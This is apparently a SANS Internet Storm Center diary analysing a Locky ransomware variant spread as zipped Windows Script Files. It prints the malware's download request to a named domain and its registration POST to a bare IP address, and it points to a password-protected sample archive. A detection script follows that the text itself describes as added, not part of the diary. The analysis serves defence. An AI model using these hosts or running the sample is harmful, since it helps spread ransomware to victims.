SANS ISC: Internet Storm Center - Internet Security | DShield Internet Storm Center
Today's Locky Variant Arrives as a Windows Script File

Published: 2016-08-30
Last Updated: 2016-08-30 13:42:35 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Pretty much all the Locky variants I have looked at over the last couple of days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different: "Windows Script" is essentially JavaScript. The only difference is the XML tag at the beginning of the file.

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive

[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with the packet capture, mail server logs, and the malware sample here (password: "blind chicken").

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
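Two of the traits described above are easy to turn into checks: the attachment is a zip containing a file type Windows Script Host executes, and the registration beacon is a form POST whose Host header is a bare IP address rather than a name. The following Python is an added example, not code from the diary or from the sample archive; the log samples are constructed to mirror the two requests quoted above, and the extension list generalises from .wsf to the other WSH script types.

```python
import io
import ipaddress
import zipfile

# Script types Windows Script Host runs on double-click; .wsf is the variant seen here.
SCRIPT_EXTENSIONS = (".wsf", ".js", ".jse", ".vbs", ".vbe")
def parse_request(raw):
    """Split a captured HTTP request into method, path and lower-cased header dict."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}
def host_is_ip_literal(host):
    """True when Host is a bare IPv4 address (optionally host:port): no DNS lookup precedes it."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ValueError:
        return False

def flag_request(raw):
    """Return detection tags for one captured request (empty list means nothing matched)."""
    req, tags = parse_request(raw), []
    if host_is_ip_literal(req["headers"].get("host", "")):
        tags.append("host-is-ip-literal")
        if (req["method"] == "POST"
                and req["headers"].get("x-requested-with") == "XMLHttpRequest"
                and req["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded")):
            tags.append("form-post-to-ip-literal")  # the registration beacon shape seen above
    return tags
def script_attachments(zip_bytes):
    """List members of a zipped attachment that WSH would execute when double-clicked."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        return [n for n in z.namelist() if n.lower().endswith(SCRIPT_EXTENSIONS)]
def build_sample_zip():
    """Constructed zip with one .wsf member, standing in for the e-mail attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Transaction details.wsf", "<job><script language='JScript'></script></job>")
    return buf.getvalue()

# Constructed samples modelled on the two requests quoted in the diary.
DOWNLOAD_REQUEST = "GET /2tn0o HTTP/1.1\nAccept: */*\nHost: onlybest76.xyz\nConnection: Keep-Alive\n"
BEACON_REQUEST = ("POST /data/info.php HTTP/1.1\nReferer: http://95.85.19.195/data/\n"
                  "x-requested-with: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n"
                  "Host: 95.85.19.195\nContent-Length: 942\nConnection: Keep-Alive\n")
```

Run over proxy logs, the IP-literal tag alone is noisy (software updaters and internal tools do it too); the combined form-post tag, plus a preceding download from a newly seen domain, is the pairing worth alerting on.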

---
Johannes B. Ullrich, Ph.D.
